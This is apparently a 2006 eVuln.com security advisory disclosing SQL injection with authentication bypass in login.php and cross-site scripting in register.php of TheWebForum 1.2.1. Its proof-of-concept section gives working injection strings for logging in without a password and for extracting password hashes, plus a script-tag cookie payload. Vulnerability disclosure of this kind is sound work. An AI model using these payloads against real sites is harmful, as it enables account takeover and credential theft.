Script Insertion and Auth Bypass in TheWebForum

Summary

Vulnerability
Script Insertion and Auth Bypass in TheWebForum
Discovered
2006.01.06
Last Update
0 n/a
ID
EV0017
CVE
CVE-2006-0134 CVE-2006-0135
Risk Level
medium
Type
Multiple Vulnerabilities
Status
Unpatched
Vendor
TheWebForum Group
Vulnerable Software
TheWebForum (http://sourceforge.net/projects/twf/)
Version
1.2.1
PoC/Exploit
Available
Solution
Not available
Discovered by
Aliaksandr Hartsuyeu (eVuln.com)

Description

Multiple Vulnerabilities found in TheWebForum (http://sourceforge.net/projects/twf/) script.

TheWebForum has multiple vulnerabilities.

1. SQL injection and authentication bypass.

Vulnerable script: login.php

Variables $_POST['username'] or $u isn't properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code and log in without password.

SQL Injection Condition: magic_quotes_gpc=off

2. Cross-Site Scripting

Vulnerable script: register.php

Variable $www isn't properly sanitized and may contain arbitrary html or script code.

PoC/Exploit

Authentication bypass example (SQL Injection):

http://host/twf/login.php

User Name: a' or 'a'='a'/*

Password: anypassword

Get user's password hash example (SQL Injection):

http://host/twf/login.php

User Name: a' union select N,password,3 from users/*

User name will contain password's hash of user with ID=N

JavaScript insertion (XSS):

http://host/twf/register.php

Website value: <script>alert(document.cookie)</script>

Solution.

Solution for "Script Insertion and Auth Bypass in TheWebForum" is not available. Check TheWebForum Group website for updates.